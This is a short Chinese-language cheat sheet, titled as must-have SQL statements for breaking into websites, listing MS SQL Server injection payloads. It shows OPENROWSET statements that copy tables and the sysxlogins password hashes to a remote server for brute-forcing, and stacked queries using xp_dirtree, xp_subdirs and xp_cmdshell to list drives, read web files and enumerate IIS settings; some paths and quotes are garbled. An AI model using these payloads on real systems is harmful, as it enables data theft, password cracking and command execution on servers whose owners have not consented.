入侵网站必备Sql语句:(经典语句)

核心提示： 复制数据库：insert intoOPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select *from database..table

复制数据库：

insert into
OPENROWSET(SQLOLEDB,uid=sa;pwd=
123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select *
from database..table1
insert into
OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select
* from table2) select * from database..table2

复制哈西表（HASH）登录密码的hash存储于sysxlogins中。方法如下：

insert into
OPENROWSET (SQLOLEDB,
uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from
_sysxlogins) select * from database.dbo.sysxlogins
得到hash之后，就可以进行暴力破解。

遍历目录的方法： 先创建一个临时表：temp

;create table temp(id

nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs c:;-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;--

获得所有子目录的目录树结构,并寸入temp表中

;insert into temp(id) exec

master.dbo.xp_cmdshell type c:webindex.asp;-- 查看某个文件的内容

;insert

into temp(id) exec master.dbo.xp_cmdshell dir c:;--

;insert into

temp(id) exec master.dbo.xp_cmdshell dir c: *.asp /s/a;--

;insert

into temp(id) exec master.dbo.xp _cmdshell cscript

C:InetpubAdminScriptsadsutil.vbs enum w3svc